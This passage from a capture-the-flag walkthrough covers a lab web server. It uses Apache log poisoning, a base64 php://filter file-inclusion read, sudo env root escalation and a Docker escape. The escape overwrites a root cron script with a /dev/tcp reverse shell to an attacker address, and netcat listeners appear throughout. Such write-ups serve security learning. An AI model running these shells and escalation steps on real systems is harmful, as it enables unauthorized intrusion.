<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="978" height="628" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png" alt="" class="wp-image-1184683" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png 978w, https://blog.finxter.com/wp-content/uplo...00x193.png 300w, https://blog.finxter.com/wp-content/uplo...68x493.png 768w" sizes="(max-width: 978px) 100vw, 978px" /></figure>
</div>
<h3>STEP 2</h3>
<p>Let’s first start up a <code>netcat</code> listener on port 2222.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 2222</pre>
<h3>STEP 3</h3>
<p>Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the <code>shell.php</code> code and rename it <code>bshell.php</code> on the target machine. </p>
<p>This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png" alt="" class="wp-image-1184682" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<h3>STEP 4</h3>
<p>We’ll spin up a simple python HTTP server in the same directory as our revshell to serve <code>shell.php</code> to our target machine via the modified web request we created in <code>burpsuite</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="467" height="123" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png" alt="" class="wp-image-1184681" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png 467w, https://blog.finxter.com/wp-content/uplo...300x79.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></figure>
</div>
<h3>STEP 5</h3>
<p>Click forward on burp and check to see if code 200 came through for <code>shell.php</code> on the HTTP server.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="465" height="271" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png" alt="" class="wp-image-1184680" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png 465w, https://blog.finxter.com/wp-content/uplo...00x175.png 300w" sizes="(max-width: 465px) 100vw, 465px" /></figure>
</div>
<h3>STEP 6</h3>
<p>We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="940" height="175" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png" alt="" class="wp-image-1184679" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png 940w, https://blog.finxter.com/wp-content/uplo...300x56.png 300w, https://blog.finxter.com/wp-content/uplo...68x143.png 768w" sizes="(max-width: 940px) 100vw, 940px" /></figure>
</div>
<h3>STEP 7</h3>
<p>We successfully caught it! Now we are in with our initial foothold!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="202" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png" alt="" class="wp-image-1184678" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png 458w, https://blog.finxter.com/wp-content/uplo...00x132.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="688" height="613" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png" alt="" class="wp-image-1184708" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png 688w, https://blog.finxter.com/wp-content/uplo...00x267.png 300w" sizes="(max-width: 688px) 100vw, 688px" /></figure>
</div>
<p>LOCATE THE FIRST FLAG</p>
<p>Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
</pre>
<p>Now we can decode this string (saved as <code>firstflag.txt</code>) with <code>base64</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>
</pre>
<h2>LOCAL RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="689" height="854" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png" alt="" class="wp-image-1184707" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png 689w, https://blog.finxter.com/wp-content/uplo...42x300.png 242w" sizes="(max-width: 689px) 100vw, 689px" /></figure>
</div>
<h3>LOCATE THE SECOND FLAG</h3>
<p>We manually enumerate the filesystem and discover the second flag at <code>/var/www/flag2_QMW7JvaY2LvK.txt</code></p>
<p>Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find / -type f -name '*flag*' 2>/dev/null</pre>
<p>We found the second flag in plaintext!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}
</pre>
<h3>CHECK SUDO PERMISSIONS</h3>
<p>Let’s check out our sudo permissions with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env
</pre>
<h2>EXPLOIT/PRIVILEGE ESCALATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="914" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png" alt="" class="wp-image-1184705" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png 607w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 607px) 100vw, 607px" /></figure>
</div>
<p>Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ sudo env /bin/bash</pre>
<p>Now we can verify that we are root with the command <code>whoami</code>.</p>
<h3>GRAB THE THIRD FLAG </h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}
</pre>
<h2>POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER</h2>
<p>Let’s start up a new listener to catch the new bash shell outside of the container.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 3333</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="627" height="259" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png" alt="" class="wp-image-1184677" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png 627w, https://blog.finxter.com/wp-content/uplo...00x124.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
</div>
<p>We notice that there is a <code>backup.sh</code> that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}
</pre>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="614" height="907" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png" alt="" class="wp-image-1184704" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png 614w, https://blog.finxter.com/wp-content/uplo...03x300.png 203w" sizes="(max-width: 614px) 100vw, 614px" /></figure>
</div>
<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. </p>
<p>Once we secured a revshell, the rest of the box went pretty quickly. </p>
<p>The final step of breaking out of a docker container with a second revshell was the sneakiest part for me. </p>
<p>The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend. </p>
</div>
https://www.sickgaming.net/blog/2023/03/...asy-video/